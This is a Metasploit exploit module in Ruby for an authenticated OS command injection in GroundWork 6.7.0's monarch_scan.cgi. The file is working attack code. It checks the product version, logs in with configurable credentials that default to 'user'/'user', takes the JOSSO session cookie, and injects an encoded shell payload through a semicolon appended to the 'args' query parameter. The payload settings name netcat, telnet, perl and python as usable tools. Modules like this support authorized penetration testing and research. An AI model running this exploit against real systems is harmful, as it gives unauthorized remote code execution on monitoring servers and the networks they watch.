##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "GroundWork monarch_scan.cgi OS Command Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in GroundWork 6.7.0. This software
        is used for network, application and cloud monitoring. The vulnerability exists in
        the monarch_scan.cgi, where user controlled input is used in the perl qx function,
        which allows any remote authenticated attacker, whatever his privileges are, to
        inject system commands and gain arbitrary code execution. The module has been tested
        successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04
        based VM appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Johannes Greil', # Vulnerability Discovery, PoC
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '91051' ],
          [ 'US-CERT-VU', '345260' ],
          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
        ],
      'Arch'            => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 8190,
          'DisableNops' => true,
          'Compat'          =>
            {
              'PayloadType' => 'cmd'
            },
          # Based on the default Ubuntu 10.04 VM appliance
          'RequiredCmd' => 'generic telnet netcat perl python'
        },
      'Platform'       => ['unix', 'linux'],
      'Targets'        =>
        [
          ['GroundWork 6.7.0', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 8 2013",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('USERNAME',  [true, 'GroundWork Username', 'user']),
          OptString.new('PASSWORD',  [true, 'GroundWork Password', 'user'])
        ], self.class)
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("josso", "signon", "login.do")
    })

    if res and res.body =~ /GroundWork.*6\.7\.0/
      return Exploit::CheckCode::Appears
    elsif res and res.body =~ /GroundWork/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def get_josso_token
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri("josso", "signon", "usernamePasswordLogin.do"),
      'vars_post' => {
        'josso_cmd'      => 'login',
        'josso_username' => datastore['USERNAME'],
        'josso_password' => datastore['PASSWORD']
      }
    })
    if res and res.headers['Set-Cookie'] =~ /JOSSO_SESSIONID_josso=([A-F0-9]+)/
      return $1
    else
      return nil
    end
  end

  def execute_command(command)
    http_handler = ((datastore['SSL']) ? "https" : "http")
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri("monarch", "monarch_scan.cgi"),
      'headers'   =>
        {
          'Referer' => "#{http_handler}://#{rhost}/portal/auth/portal/groundwork-monitor/auto-disc"
        },
      'cookie'    => "JOSSO_SESSIONID=#{@josso_id}",
      'query'     => "args=#{rand_text_alpha(3)}&args=#{rand_text_alpha(3)}&args=#{Rex::Text.uri_encode(command + ";")}"
    })
    return res
  end

  def exploit
    peer = "#{rhost}:#{rport}"

    print_status("#{peer} - Attempting to login...")
    @josso_id = get_josso_token
    if @josso_id.nil?
      fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID")
    end
    print_good("#{peer} - Authentication successful")

    print_status("#{peer} - Sending malicious request...")
    execute_command(payload.encoded)
  end
end